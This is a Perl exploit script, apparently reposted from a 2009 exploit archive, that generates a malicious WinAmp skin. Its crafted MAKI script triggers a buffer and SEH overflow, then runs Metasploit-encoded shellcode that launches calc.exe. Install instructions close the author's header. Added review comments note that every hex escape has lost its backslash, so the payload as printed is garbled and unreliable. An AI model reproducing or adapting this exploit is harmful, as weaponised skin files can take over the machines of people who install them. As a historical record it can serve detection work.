
winamp5541-overflow.txt

Posted on 05 March 2009

#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!

# NOTE(review): as reproduced on this page every "\xNN" escape has lost its
# backslash (the literals read "x41", not "\x41"), so the strings below are
# plain ASCII text rather than the bytes the comments describe, and the
# print() banners have lost their trailing "\n".  Per the header the bug was
# fixed in WinAmp 5.55; treat this listing as a historical record of a
# malformed-skin (.maki) parsing overflow, useful for writing detections for
# oversized/unexpected skin files, not as something to run.

use strict;
use warnings;

# Contents of skin.xml for the generated skin directory.  The hex spells out
# a UTF-8 BOM followed by an XML document ("<?xml version="1.0" ..." /
# "<WinampAbstractionLayer ...>") that references the s.maki script written
# further down.
my $skin_xml =
"xEFxBBxBFx3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3D".
"x22x55x54x46x2Dx38x22x20x73x74x61x6Ex64x61x6Cx6Fx6Ex65x3Dx22x79x65x73x22x3Fx3Ex0Dx0Ax0Dx0Ax3Cx57".
"x69x6Ex61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x20x76x65x72x73x69x6Fx6Ex3Dx22x31".
"x2Ex33x34x22x3Ex0Dx0Ax09x3Cx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax09x09x3Cx76x65x72x73x69x6Fx6Ex3Ex31".
"x2Ex32x3Cx2Fx76x65x72x73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx6Ex61x6Dx65x3Ex42x65x6Ex74x6Fx3Cx2Fx6Ex61x6D".
"x65x3Ex0Dx0Ax09x09x3Cx61x75x74x68x6Fx72x3Ex53x6Bx44x3Cx2Fx61x75x74x68x6Fx72x3Ex0Dx0Ax09x09x3Cx63".
"x6Fx6Dx6Dx65x6Ex74x3Ex53x6Bx44x3Cx2Fx63x6Fx6Dx6Dx65x6Ex74x3Ex0Dx0Ax09x09x3Cx65x6Dx61x69x6Cx3Ex73".
"x6Bx64x72x61x74x40x68x6Fx74x6Dx61x69x6Cx2Ex63x6Fx6Dx3Cx2Fx65x6Dx61x69x6Cx3Ex0Dx0Ax09x09x3Cx73x63".
"x72x65x65x6Ex73x68x6Fx74x3Ex53x6Bx44x73x68x6Fx74x2Ex70x6Ex67x3Cx2Fx73x63x72x65x65x6Ex73x68x6Fx74".
"x3Ex0Dx0Ax09x09x3Cx68x6Fx6Dx65x70x61x67x65x3Ex68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex53x6Bx44x2Ex63x6F".
"x6Dx2Fx3Cx2Fx68x6Fx6Dx65x70x61x67x65x3Ex0Dx0Ax09x3Cx2Fx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax0Dx0Ax09".
"x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x67x65x6Ex65x72x61x6Cx22x3E".
"x0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx46x22x20x61x63".
"x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx46x49x4Cx45x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63".
"x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx50x22x20x61x63x74x69x6Fx6Ex3Dx22x4D".
"x45x4Ex55x48x4Fx54x4Bx45x59x5Fx50x4Cx41x59x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74".
"x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx4Fx22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4B".
"x45x59x5Fx4Fx50x54x49x4Fx4Ex53x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62".
"x69x6Ex64x3Dx22x41x6Cx74x2Bx49x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx56".
"x49x45x57x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6C".
"x74x2Bx48x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx48x45x4Cx50x22x20x2Fx3E".
"x0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x6Ex6Fx72x6Dx61x6Cx22x3Ex0Dx0Ax09x09x09x3Cx61x63x63x65".
"x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x73x70x61x63x65x22x20x61x63x74x69x6Fx6Ex3Dx22x53x48x4F".
"x57x5Fx43x55x52x52x45x4Ex54x5Fx54x52x41x43x4Bx22x20x2Fx3Ex0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx21x2Dx2Dx20x54x68x69x73x20x53x6Bx69x6Ex20x75x73x65x73x20x73x68".
"x61x72x65x64x20x47x72x61x70x68x69x63x73x2Cx20x58x4Dx4Cx20x61x6Ex64x20x4Dx61x6Bx69x20x66x72x6Fx6D".
"x20x27x42x69x67x20x42x65x6Ex74x6Fx27x20x2Dx2Dx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3Ex0Dx0A".
"x09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3Dx22x73".
"x6Dx61x6Cx6Cx22x2Fx3Ex20x3Cx21x2Dx2Dx20x4Dx75x73x74x20x62x65x20x6Cx6Fx61x64x65x64x20x61x74x20x66".
"x69x72x73x74x20x2Dx2Dx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax09x3Cx69x6Ex63x6Cx75".
"x64x65x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x2Fx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3E".
"x0Dx0Ax09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3D".
"x22x31x33x30x2Cx31x38x22x2Fx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax3Cx2Fx57x69x6E".
"x61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x3E";

# First part of the compiled MAKI script (s.maki).  The overflow payload is
# spliced between $maki_script1 and $maki_script2 in the print() at the
# bottom; this half ends in the ASCII name "getRuntimeVersion".
my $maki_script1 =
"x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0Dx51x4Ax91xE3xA6xB5x32x35xF3xE7x64x0FxF5xD6".
"xFAx93xB7x49x93xF1xBAx66xEFxAEx3Ex98x7BxC4x0DxE9x0Dx84xE7x4AxB0x2Cx04x0BxD2x75xF7xFCxB5x3Ax02xB2".
"x4Dx43xA1x4BxBExAEx59x63x75x03xF3xC6x78x57xC6x87x43xE7xFEx49x85xF9x09xCCx53x2AxFDx56x65x36x60x38".
"x1Bx46xA7x42xAAx75xD8x3Fx66x67xBFx73xF4x7Ax78xF4xBBxB2xF7x4Ex9CxFBxE7x4BxA9xBExA8x8Dx02x0Cx37x3A".
"xBFx3Cx9Fx43x84xF1x86x88x5BxCFx1Ex36xB6x5Bx0Cx5DxE1x7Dx1Fx4BxA7x0Fx8Dx16x59x94x19x41x99xE1xE3x4E".
"x36xC6xECx4Bx97xCDx78xBCx9Cx86x28xB0xE5x95xBEx45x72x20x91x41x93x5CxBBx5FxF9xF1x17xFDx4Ex6Dx90x60".
"x7Ex53x2Ex48xB0x04xCCx94x61x88x56x72xC0xBCx3Ax40x22x6FxD6x4Bx8BxA4x10xC8x29x93x25x47x4Dx3ExAAx97".
"xD0xF4xA8x4Fx81x7Bx0AxF2x2Ax45x49x83xFAxBBxE4x64xF4x81xD9x49xB0xC0xA8x5Bx2ExC3xBCxFDx3Fx5ExB6x62".
"x5Ex37x8Dx40x8DxEAx76x81x4AxB9x1Bx77xBEx97x4FxCExB0x77x19x4Ex99x56xD4x98x33xC9x6Cx27x0Dx20xC2xA8".
"xEBx51x2Ax4BxBAx7Fx5Dx4BxC6x5Dx4Cx71x38xBAx1Ex8Dx9Ex48x3Ex48xB9x60x8Dx1Fx43xC5xC4x05x40xC9x08x0F".
"x39xAFx23x4Bx80xF3xB8xC4x8Fx7ExBBx59x72x86xAAxEFx0Ex31xFAx41xB7xDCx85xA9x52x5BxCBx4Bx44x32xFDx7D".
"x51x37x7Cx4ExBFx40x82xAEx5Fx3AxDCx33x15xFAxB9x5Ax7Dx9Ax57x45xABxC8x65x57xA6xC6x7CxA9xCDxDDx8Ex69".
"x1Ex8FxECx4Fx9Bx12xF9x44xF9x09xFFx45x27xCDx64x6Bx26x5Ax4Bx4Cx8Cx59xE6xA7x0CxF6x49x3AxE4x05xCBx6D".
"xC4x8AxC2x48xB1x93x49xF0x91x0ExF5x4AxFFxCFxDCxB4xFEx81xCCx4Bx96x1Bx72x0FxD5xBEx0FxFFxE1x8CxE2x01".
"x59xB0xD5x11x97x9FxE4xDEx6Fx51x76x0AxBDxF8xF0x80xA5x1BxA6x42xA0x93x32x36xA0x0Cx8Dx4Ax1Bx34x2Ex9B".
"x98x6CxFAx40x8Bx85x0Cx1Bx6ExE8x94x05x71x9BxD5x36xFDx03xF8x4Ax97x95x05x02xB7xDBx26x7Ax10xF2xD5x7F".
"xC4xACxDFx48xA6xA0x54x51x57x6CxDCx76x35xA5xBAxB5xB3x05xCBx4DxADxC1xE6x18xD2x8Fx68x96xC1xFEx29x61".
"xB7xDAx51x4Dx91x65x01xCAx0Cx1Bx70xDBxF7x14x95xD5x36xEDxE8x45x98x0Fx3Fx4ExA0x52x2CxD9x82x4Bx3Bx9B".
"x7Ax66x0Ex42x8FxFCx79x41x15x80x9Cx02x99x31xEDxC7x19x53x98x47x98x63x60xB1x5Ax29x8CxAAx4DxC1xBBxE2".
"xF6x84x73x41xBDxB3xB2xEBx2Fx66x55x50x94x05xC0x73x1Fx96x1Bx40x9Bx1Bx67x24x27xACx41x65x12x00x00x00".
"x01x01x00x00x11x00x67x65x74x52x75x6Ex74x69x6Dx65x56x65x72x73x69x6Fx6E";

# Remainder of the compiled MAKI script, written after the payload.  The
# leading bytes are a table of ASCII function names ("getSkinName",
# "getPrivateInt", "messageBox", ...), followed by the script body and its
# string table (e.g. "This script requires Winamp 5.54 (skin version 1.34)").
my $maki_script2 =
"x01x01x00x00x0Bx00x67x65x74x53x6Bx69x6Ex4Ex61x6Dx65x01x01x00x00x0Dx00x67x65x74x50x72x69x76x61x74".
"x65x49x6Ex74x01x01x00x00x0Cx00x67x65x74x54x69x6Dx65x4Fx66x44x61x79x01x01x00x00x0Dx00x73x65x74x50".
"x72x69x76x61x74x65x49x6Ex74x01x01x00x00x0Ax00x6Dx65x73x73x61x67x65x42x6Fx78x01x01x00x00x0Fx00x69".
"x6Ex74x65x67x65x72x54x6Fx53x74x72x69x6Ex67x01x01x00x00x0Ex00x6Fx6Ex53x63x72x69x70x74x4Cx6Fx61x64".
"x65x64x01x01x00x00x0Ex00x67x65x74x53x63x72x69x70x74x47x72x6Fx75x70x0Ax01x00x00x09x00x67x65x74x4F".
"x62x6Ax65x63x74x01x01x00x00x0Dx00x6Fx6Ex53x65x74x58x75x69x50x61x72x61x6Dx01x01x00x00x08x00x73x74".
"x72x6Cx6Fx77x65x72x01x01x00x00x0Fx00x73x74x72x69x6Ex67x54x6Fx49x6Ex74x65x67x65x72x14x01x00x00x07".
"x00x73x65x74x54x65x78x74x16x01x00x00x0Bx00x73x65x74x58x6Dx6Cx70x61x72x61x6Dx14x01x00x00x0Dx00x6F".
"x6Ex54x65x78x74x43x68x61x6Ex67x65x64x14x01x00x00x0Cx00x67x65x74x41x75x74x6Fx57x69x64x74x68x14x01".
"x00x00x0Bx00x73x65x74x58x6Dx6Cx50x61x72x61x6Dx23x00x00x00x01x01x00x00x00x00x00x00x00x00x00x00x01".
"x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00x02x00x00x00xFFxFFx00".
"x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x14x01x00".
"x00x00x00x00x00x00x00x00x00x01x00x14x01x00x00x00x00x00x00x00x00x00x00x01x00x16x01x00x00x00x00x00".
"x00x00x00x00x00x01x00x0Ax01x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00".
"x00x01x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x0Dx00x00".
"x00x07x00x00x00x0Cx00x72x75x6Ex74x69x6Dx65x63x68x65x63x6Bx0Cx00x00x00x15x00x54x68x69x73x20x73x63".
"x72x69x70x74x20x72x65x71x75x69x72x65x73x20x0Dx00x00x00x1Fx00x57x69x6Ex61x6Dx70x20x35x2Ex35x34x20".
"x28x73x6Bx69x6Ex20x76x65x72x73x69x6Fx6Ex20x31x2Ex33x34x29x0Ex00x00x00x05x00x45x72x72x6Fx72x0Fx00".
"x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x18x00x00x00x04x00x74x65x78x74x19x00x00x00x05x00x6C".
"x61x62x65x6Cx1Ax00x00x00x04x00x6Cx69x6Ex6Bx1Dx00x00x00x05x00x73x68x69x66x74x1Ex00x00x00x07x00x74".
"x6Fx6Fx6Cx74x69x70x21x00x00x00x01x00x78x22x00x00x00x01x00x77x03x00x00x00x00x00x00x00x07x00x00x00".
"x5Fx01x00x00x00x00x00x00x0Ax00x00x00xCCx01x00x00x14x00x00x00x0Fx00x00x00x7Bx02x00x00x1Bx03x00x00".
"x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00x30x02x01x03x00x00x00x01x04x00x00x00x0Cx01x03x00x00".
"x00x01x05x00x00x00x0Ax51x10xB9x00x00x00x01x02x00x00x00x01x06x00x00x00x30x02x01x09x00x00x00x01x00".
"x00x00x00x01x08x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01x0A".
"x00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0Ax00x00x00x01x09x00x00x00x41x01x0Bx00x00x00x0C".
"x01x09x00x00x00x01x0Ax00x00x00x0Cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00x00x01x00x00x00".
"x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00".
"x01x0Fx00x00x00x01x06x00x00x00x01x0Ex00x00x00x01x0Cx00x00x00x01x0Dx00x00x00x40x18x05x00x00x00x02".
"x01x08x00x00x00x21x01x06x00x00x00x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0Fx00x00".
"x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00x00x00x04x02x01x01x00x00x00x21x03x12x00".
"x00x00x01x00x00x00x00x01x0Fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00x01x12x00x00x00".
"x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01x00x00x00x21x01x17x00x00x00x01x08x00x00x00x30x02x19".
"x9CxFExFFxFFx11x06x00x00x00x01x01x00x00x00x21x01x16x00x00x00x01x00x00x00x00x70x08x00x00x00x00x30".
"x02x01x13x00x00x00x01x16x00x00x00x01x18x00x00x00x70x09x00x00x00x01x30x02x01x14x00x00x00x01x16x00".
"x00x00x01x19x00x00x00x70x09x00x00x00x01x30x02x01x15x00x00x00x01x16x00x00x00x01x1Ax00x00x00x70x09".
"x00x00x00x01x30x02x01x01x00x00x00x21x03x1Bx00x00x00x03x1Cx00x00x00x01x02x00x00x00x10x06x00x00x00".
"x01x01x00x00x00x21x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Dx00x00x00x08x10x17x00x00".
"x00x01x17x00x00x00x01x00x00x00x00x01x1Cx00x00x00x70x0Cx00x00x00x01x30x02x01x00x00x00x00x01x1Bx00".
"x00x00x70x0Bx00x00x00x01x01x19x00x00x00x08x10x11x00x00x00x01x14x00x00x00x01x1Cx00x00x00x70x0Dx00".
"x00x00x01x02x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Ax00x00x00x08x10x16x00x00x00x01".
"x15x00x00x00x01x1Cx00x00x00x01x1Ex00x00x00x70x0Ex00x00x00x02x02x01x01x00x00x00x21x03x1Fx00x00x00".
"x01x02x00x00x00x10x06x00x00x00x01x01x00x00x00x21x01x20x00x00x00x01x14x00x00x00x70x10x00x00x00x00".
"x01x17x00x00x00x40x30x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x70x06x00x00x00x01x01x21x00".
"x00x00x70x11x00x00x00x02x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x4Cx70x06x00x00x00x01x01".
"x22x00x00x00x70x11x00x00x00x02x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02".
"x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21";

# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
# (Metasploit-generated payload per the author's line above; nothing in this
# file decodes or inspects it, it is only concatenated into s.maki.)
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d".
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c".
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45".
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36".
"x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e".
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a".
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d".
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74".
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57".
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38".
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b".
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77".
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b".
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53".
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f".
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31".
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50".
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37".
"x70x41";

# Padding and control-transfer pieces; their order in the written file is
# fixed by the single print() to $maki_script_file below.  The address
# comments are the author's and are not verified here.
my $overflow1 = "x41" x 314;
my $overflow2 = "x41" x 128;
my $overflow3 = "x90" x 8;
my $sehjmp = "xebx12x41x41";
my $sehret = "x11x10xf0x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "xf8x99x01x12"; #0x120199F8 JMP ESP
my $nopsled = "x90" x 12;

print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit ";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com) ";

# NOTE(review): rmdir() only removes an empty directory and neither rmdir()
# nor mkdir() is checked, so a directory left over from an earlier run is
# silently reused.
print "[x] Creating skin dir ";
rmdir("SkD's Skin");
mkdir("SkD's Skin");

# NOTE(review): 2-arg open() with the mode embedded in the path and no
# `or die`; if the open fails, the print() to the unopened handle only emits a
# warning.  As printed, "\s" is not a recognised escape in a double-quoted
# string (warnings reports it and passes "s" through), so the path does not
# contain the directory separator the author intended.
print "[x] Creating skin.xml file ";
open(my $skin_xml_file, ">SkD's Skin\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;

# Same unchecked 2-arg open() as above.  binmode keeps the concatenated
# payload bytes untouched on Windows; the write is the full s.maki layout:
# script head, padding, SEH/EIP pieces, NOP sled, shellcode, padding, script tail.
print "[x] Creating malicious MAKI script ";
open(my $maki_script_file, ">SkD's Skin\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1. $overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2. $maki_script2;
close $maki_script_file;

print "[x] Universal exploit created! ";

 

